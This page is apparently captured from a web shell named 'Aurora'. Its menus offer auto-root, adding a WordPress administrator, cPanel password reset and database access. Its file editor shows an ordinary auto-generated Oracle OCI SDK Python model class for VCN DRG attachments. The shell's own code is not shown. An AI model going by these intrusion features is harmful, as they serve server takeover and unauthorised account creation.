Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
lib
python3.9
site-packages
oci
core
models
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: vcn_drg_attachment_network_create_details.py
# coding: utf-8 # Copyright (c) 2016, 2024, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. # NOTE: This class is auto generated by OracleSDKGenerator. DO NOT EDIT. API Version: 20160918 from .drg_attachment_network_create_details import DrgAttachmentNetworkCreateDetails from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401 from oci.decorators import init_model_state_from_kwargs @init_model_state_from_kwargs class VcnDrgAttachmentNetworkCreateDetails(DrgAttachmentNetworkCreateDetails): """ Specifies the VCN Attachment """ def __init__(self, **kwargs): """ Initializes a new VcnDrgAttachmentNetworkCreateDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.core.models.VcnDrgAttachmentNetworkCreateDetails.type` attribute of this class is ``VCN`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param type: The value to assign to the type property of this VcnDrgAttachmentNetworkCreateDetails. Allowed values for this property are: "VCN" :type type: str :param id: The value to assign to the id property of this VcnDrgAttachmentNetworkCreateDetails. :type id: str :param route_table_id: The value to assign to the route_table_id property of this VcnDrgAttachmentNetworkCreateDetails. :type route_table_id: str :param vcn_route_type: The value to assign to the vcn_route_type property of this VcnDrgAttachmentNetworkCreateDetails. :type vcn_route_type: str """ self.swagger_types = { 'type': 'str', 'id': 'str', 'route_table_id': 'str', 'vcn_route_type': 'str' } self.attribute_map = { 'type': 'type', 'id': 'id', 'route_table_id': 'routeTableId', 'vcn_route_type': 'vcnRouteType' } self._type = None self._id = None self._route_table_id = None self._vcn_route_type = None self._type = 'VCN' @property def route_table_id(self): """ Gets the route_table_id of this VcnDrgAttachmentNetworkCreateDetails. This is the `OCID`__ of the route table that is used to route the traffic as it enters a VCN through this attachment. For information about why you would associate a route table with a DRG attachment, see `Advanced Scenario: Transit Routing`__. For information about why you would associate a route table with a DRG attachment, see: * `Transit Routing: Access to Multiple VCNs in Same Region`__ * `Transit Routing: Private Access to Oracle Services`__ __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm __ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm __ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm __ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitroutingoracleservices.htm :return: The route_table_id of this VcnDrgAttachmentNetworkCreateDetails. :rtype: str """ return self._route_table_id @route_table_id.setter def route_table_id(self, route_table_id): """ Sets the route_table_id of this VcnDrgAttachmentNetworkCreateDetails. This is the `OCID`__ of the route table that is used to route the traffic as it enters a VCN through this attachment. For information about why you would associate a route table with a DRG attachment, see `Advanced Scenario: Transit Routing`__. For information about why you would associate a route table with a DRG attachment, see: * `Transit Routing: Access to Multiple VCNs in Same Region`__ * `Transit Routing: Private Access to Oracle Services`__ __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm __ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm __ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm __ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitroutingoracleservices.htm :param route_table_id: The route_table_id of this VcnDrgAttachmentNetworkCreateDetails. :type: str """ self._route_table_id = route_table_id @property def vcn_route_type(self): """ Gets the vcn_route_type of this VcnDrgAttachmentNetworkCreateDetails. Indicates whether the VCN CIDRs or the individual subnet CIDRs are imported from the attachment. Routes from the VCN ingress route table are always imported. :return: The vcn_route_type of this VcnDrgAttachmentNetworkCreateDetails. :rtype: str """ return self._vcn_route_type @vcn_route_type.setter def vcn_route_type(self, vcn_route_type): """ Sets the vcn_route_type of this VcnDrgAttachmentNetworkCreateDetails. Indicates whether the VCN CIDRs or the individual subnet CIDRs are imported from the attachment. Routes from the VCN ingress route table are always imported. :param vcn_route_type: The vcn_route_type of this VcnDrgAttachmentNetworkCreateDetails. :type: str """ self._vcn_route_type = vcn_route_type def __repr__(self): return formatted_flat_dict(self) def __eq__(self, other): if other is None: return False return self.__dict__ == other.__dict__ def __ne__(self, other): return not self == other